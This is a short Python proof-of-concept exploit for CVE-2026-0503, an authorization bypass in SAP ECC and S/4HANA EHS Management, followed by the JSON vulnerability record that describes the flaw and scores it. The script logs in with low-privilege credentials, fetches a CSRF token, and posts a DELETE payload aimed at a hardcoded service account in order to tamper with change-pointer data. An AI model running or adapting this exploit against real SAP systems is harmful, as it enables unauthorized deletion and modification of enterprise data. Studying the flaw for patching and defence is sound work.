CVE-2026-0503

# CVE-2026-0503 PoC - SAP EHS Management Authorization Bypass # Target: SAP ECC / S/4HANA EHS Management import requests import json TARGET = "https://sap-server:50000/sap/opu/odata/sap/" AUTH = ("attacker", "lowprivpassword") def exploit_authorization_bypass(): headers = { "Content-Type": "application/json", "X-CSRF-Token": "Fetch" } # Step 1: Get CSRF token response = requests.get( TARGET + "EHS_SSM_CHGPTR_SRV/ChangePointerSet", auth=AUTH, headers=headers, verify=False, timeout=30 ) csrf_token = response.headers.get("x-csrf-token", "") # Step 2: Exploit authorization bypass by manipulating user parameters exploit_payload = { "UserName": "SAPServiceEHS", # Target hardcoded service account "ChangePointerId": "MANIPULATED_ID", "Action": "DELETE" } headers["x-csrf-token"] = csrf_token headers["X-Requested-With"] = "XMLHttpRequest" # Step 3: Bypass authorization check response = requests.post( TARGET + "EHS_SSM_CHGPTR_SRV/ChangePointerSet", auth=AUTH, headers=headers, json=exploit_payload, verify=False, timeout=30 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Authorization bypass successful!") print("[+] Attacker can now access/modify/delete change pointers") else: print("[-] Exploitation failed") if __name__ == "__main__": exploit_authorization_bypass()

{"cve": {"id": "CVE-2026-0503", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:52.953", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to missing authorization check in the SAP ERP Central Component (SAP ECC) and SAP S/4HANA (SAP EHS Management), an attacker could extract hardcoded clear-text credentials and bypass the password authentication check by manipulating user parameters. Upon successful exploitation, the attacker can access, modify or delete certain change pointer information within EHS objects in the application which might further affect the subsequent systems. This vulnerability leads to a low impact on confidentiality and integrity of the application with no affect on the availability."}, {"lang": "es", "value": "Debido a una falta de verificación de autorización en SAP ERP Central Component (SAP ECC) y SAP S/4HANA (SAP EHS Management), un atacante podría extraer credenciales codificadas en texto claro y eludir la verificación de autenticación de contraseña manipulando parámetros de usuario. Tras una explotación exitosa, el atacante puede acceder, modificar o eliminar cierta información de punteros de cambio dentro de objetos EHS en la aplicación, lo que podría afectar aún más a los sistemas subsiguientes. Esta vulnerabilidad conlleva a un impacto bajo en la confidencialidad y la integridad de la aplicación, sin afectar la disponibilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3681523", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}